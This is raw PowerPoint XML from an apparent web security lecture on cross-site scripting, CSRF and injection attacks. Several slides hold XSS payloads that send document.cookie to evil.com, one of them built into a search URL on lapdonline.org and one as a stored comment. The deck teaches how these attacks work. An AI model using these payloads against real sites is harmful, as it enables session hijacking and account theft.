        <p:nvPicPr>
          <p:cNvPr id="710" name="Picture 10"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="490320" y="845640"/>
            <a:ext cx="1218960" cy="1218960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="711" name="Picture 11"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934320" y="951480"/>
            <a:ext cx="1101600" cy="1101600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="712" name="Picture 12"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5176080" y="1525320"/>
            <a:ext cx="1905120" cy="1108800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="713" name="Straight Arrow Connector 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3468240" y="2053440"/>
            <a:ext cx="1523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4" name="Straight Arrow Connector 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6135480" y="2786760"/>
            <a:ext cx="360" cy="159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715" name="Picture 18"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1591200" y="4538880"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="716" name="Straight Arrow Connector 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5754240" y="2862720"/>
            <a:ext cx="360" cy="152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7" name="Straight Arrow Connector 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3086640" y="2862720"/>
            <a:ext cx="2088360" cy="1675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8" name="TextBox 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2876040" y="2085840"/>
            <a:ext cx="2689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“Check out this link!”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19" name="TextBox 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6955560" y="5021280"/>
            <a:ext cx="1862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lapdonline.org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20" name="TextBox 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2759040" y="5086080"/>
            <a:ext cx="1145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evil.com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721" name="Picture 26"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="228240" y="5270760"/>
            <a:ext cx="1218960" cy="1218960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="722" name="Picture 27"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7081200" y="5468760"/>
            <a:ext cx="1101600" cy="1101600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="723" name="TextBox 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6479640" y="2524680"/>
            <a:ext cx="2451600" cy="282744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Cambria"/>
              </a:rPr>
              <a:t>http://www.lapdonline.org/search_results/search/&amp;view_all=1&amp;chg_filter=1&amp;searchType=content_basic&amp;search_terms=%3Cscript%3Edocument.location=evil.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" u="sng" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>;%3C/script%3E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724" name="TextBox 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4148640" y="3971160"/>
            <a:ext cx="1407960" cy="1063080"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 58272"/>
              <a:gd name="adj2" fmla="val -100278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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Response containing malicious JS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25" name="TextBox 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="969840" y="3557160"/>
            <a:ext cx="3078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evil.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>f9geiv33knv141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26" name="TextBox 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8640" y="3025800"/>
            <a:ext cx="3989880" cy="403560"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 28625"/>
              <a:gd name="adj2" fmla="val 83077"/>
              <a:gd name="adj3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Session token for lapdonline.org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899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“Stored” XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="728" name="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240" cy="4754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Problem: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr sz="3200" dirty="0"/>
            </a:b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Server stores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mbria"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a: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-laced input</a:t>
            </a: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Cambria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Attack delivery method: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr sz="3200" dirty="0"/>
            </a:b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Upload attack, users who view it are exploited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4800600"/>
            <a:ext cx="8229240" cy="10772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Stored XSS is a type of XSS that stores malicious code on the application server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16221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Picture 10" descr="Screen Shot 2012-07-02 at 3.21.04 PM.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect t="5886" b="5886"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311040" y="284040"/>
            <a:ext cx="5854320" cy="2733840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="730" name="Picture 9" descr="Screen Shot 2012-07-02 at 3.18.56 PM.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect t="3753"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311040" y="3346920"/>
            <a:ext cx="5943240" cy="3434760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="731" name="Down Arrow 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3016080" y="2758320"/>
            <a:ext cx="533160" cy="2804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732" name="Rounded Rectangular Callout 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6325200" y="1653840"/>
            <a:ext cx="2730240" cy="1127880"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -135380"/>
              <a:gd name="adj2" fmla="val 347268"/>
              <a:gd name="adj3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Cambria"/>
              </a:rPr>
              <a:t>HTML bold for emphasis!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733" name="Rounded Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6165720" y="3962520"/>
            <a:ext cx="2889720" cy="213336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>
            <a:solidFill>
              <a:srgbClr val="71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Cambria"/>
              </a:rPr>
              <a:t>Every browser that visits the page will run the “bold” command</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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01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Picture 2" descr="Screen Shot 2012-07-03 at 12.28.00 PM.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1536840" y="1511280"/>
            <a:ext cx="6070320" cy="3835080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="735" name="Rounded Rectangular Callout 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="708120"/>
            <a:ext cx="4559760" cy="936360"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -18231"/>
              <a:gd name="adj2" fmla="val 122236"/>
              <a:gd name="adj3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Fill in with &lt;script&gt;alert(“test”);&lt;script&gt;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36" name="Rounded Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="5594760"/>
            <a:ext cx="6857640" cy="118512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Cambria"/>
              </a:rPr>
              <a:t>Every browser that visits the page will run the Javascript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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80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TextBox 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="58320" y="3842640"/>
            <a:ext cx="3614400" cy="819720"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrowCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 28369"/>
              <a:gd name="adj2" fmla="val 33421"/>
              <a:gd name="adj3" fmla="val 46895"/>
              <a:gd name="adj4" fmla="val 82755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Cambria"/>
              </a:rPr>
              <a:t>Posts comment with text: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Cambria"/>
              </a:rPr>
              <a:t>&lt;script&gt;document.location = “evil.com/” + document.cookie&lt;/script&gt;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738" name="Picture 6"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3628080" y="4388400"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="739" name="Picture 7"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258560" y="2183400"/>
            <a:ext cx="1905120" cy="1108800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="740" name="Picture 10"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="490320" y="1503720"/>
            <a:ext cx="1218960" cy="1218960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="741" name="Picture 11"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7245000" y="2237400"/>
            <a:ext cx="1101600" cy="1101600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="742" name="Picture 12"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5230440" y="2213280"/>
            <a:ext cx="1905120" cy="1108800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="743" name="Picture 18"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3938760" y="224640"/>
            <a:ext cx="1239840" cy="1785240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="744" name="TextBox 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4944960" y="4871160"/>
            <a:ext cx="1862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lapdonline.org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5" name="TextBox 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5106240" y="771840"/>
            <a:ext cx="1145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evil.com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746" name="Picture 26"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2468520" y="224640"/>
            <a:ext cx="1218960" cy="1218960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="747" name="Picture 27"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070600" y="5318280"/>
            <a:ext cx="1101600" cy="1101600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="748" name="TextBox 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5239080" y="1642680"/>
            <a:ext cx="3078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evil.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>f9geiv33knv141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9" name="TextBox 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6681960" y="498960"/>
            <a:ext cx="2055960" cy="1011960"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -23541"/>
              <a:gd name="adj2" fmla="val 106226"/>
              <a:gd name="adj3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Session token for lapdonline.org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50" name="Straight Arrow Connector 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3255480" y="3310560"/>
            <a:ext cx="682560" cy="102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1" name="Straight Arrow Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4724280" y="3434400"/>
            <a:ext cx="285840" cy="73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2" name="TextBox 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5349240" y="3547800"/>
            <a:ext cx="3556440" cy="819720"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrowCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 19760"/>
              <a:gd name="adj2" fmla="val 25000"/>
              <a:gd name="adj3" fmla="val 28930"/>
              <a:gd name="adj4" fmla="val 87562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Cambria"/>
              </a:rPr>
              <a:t>Comment with text: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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>&lt;script&gt;document.location = “evil.com/” + document.cookie&lt;/script&gt;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753" name="Straight Arrow Connector 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5044320" y="3434400"/>
            <a:ext cx="286920" cy="80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4" name="Straight Arrow Connector 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5070600" y="1632960"/>
            <a:ext cx="550800" cy="72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1817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 idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1264320" y="2013480"/>
            <a:ext cx="6950880" cy="7534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Cross Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="612" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1264320" y="2919240"/>
            <a:ext cx="695088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Document Object Model</a:t>
            </a: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Cookies and Sessions</a:t>
            </a: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165240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Rounded Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5947560" y="1975680"/>
            <a:ext cx="1840680" cy="60912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Cambria"/>
              </a:rPr>
              <a:t>Server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756" name="Rounded Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207080" y="1975680"/>
            <a:ext cx="1840680" cy="60912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>
            <a:solidFill>
              <a:srgbClr val="71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Cambria"/>
              </a:rPr>
              <a:t>Attacker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757" name="Elbow Connector 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4497120" y="-394560"/>
            <a:ext cx="12240" cy="4740120"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1800000"/>
            </a:avLst>
          </a:pr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8" name="TextBox 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2949480" y="1289880"/>
            <a:ext cx="31330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1. Send XSS attack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759" name="Group 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="356040" y="2585160"/>
            <a:ext cx="8431560" cy="2289960"/>
            <a:chOff x="356040" y="2585160"/>
            <a:chExt cx="8431560" cy="2289960"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="760" name="Rounded Rectangle 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="356040" y="3505320"/>
              <a:ext cx="1840680" cy="609120"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="009446"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="006D33"/>
              </a:solidFill>
              <a:rou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800" b="0" strike="noStrike" spc="-1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t>Victim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761" name="Rounded Rectangle 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2553120" y="3505320"/>
              <a:ext cx="1840680" cy="609120"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="009446"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="006D33"/>
              </a:solidFill>
              <a:rou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800" b="0" strike="noStrike" spc="-1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t>Victim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762" name="Rounded Rectangle 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4749840" y="3505320"/>
              <a:ext cx="1840680" cy="609120"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="009446"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="006D33"/>
              </a:solidFill>
              <a:rou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800" b="0" strike="noStrike" spc="-1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t>Victim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763" name="Rounded Rectangle 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6946920" y="3505320"/>
              <a:ext cx="1840680" cy="609120"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="009446"/>
            </a:solidFill>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="006D33"/>
              </a:solidFill>
              <a:rou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800" b="0" strike="noStrike" spc="-1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t>Victim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764" name="Straight Arrow Connector 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1275840" y="2585160"/>
              <a:ext cx="5591160" cy="919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type="arrow" w="med" len="med"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="3996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65" name="Straight Arrow Connector 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3473640" y="2585160"/>
              <a:ext cx="3394080" cy="919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type="arrow" w="med" len="med"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="3996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66" name="Straight Arrow Connector 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="5669640" y="2585160"/>
              <a:ext cx="1197000" cy="919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type="arrow" w="med" len="med"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="3996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67" name="Straight Arrow Connector 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6868080" y="2585160"/>
              <a:ext cx="999360" cy="919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type="arrow" w="med" len="med"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="3996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68" name="TextBox 24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1522440" y="4419720"/>
              <a:ext cx="60987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400" b="0" strike="noStrike" spc="-1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Cambria"/>
                </a:rPr>
                <a:t>2. Victim exploited just by visiting site</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="769" name="Picture 16"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7737840" y="2302560"/>
            <a:ext cx="797040" cy="797040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="770" name="Picture 20"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2962800" y="2381400"/>
            <a:ext cx="660600" cy="660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79208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Content</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="+mj-lt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 sz="2800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRP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Cross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Site Scripting (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XSS)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charset="-122"/>
              </a:rPr>
              <a:t>Injection Attacks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Cross Site Request Forgery (CSRF)</a:t>
            </a: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Multi-Party Web Applications</a:t>
            </a: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Web Security Issues</a:t>
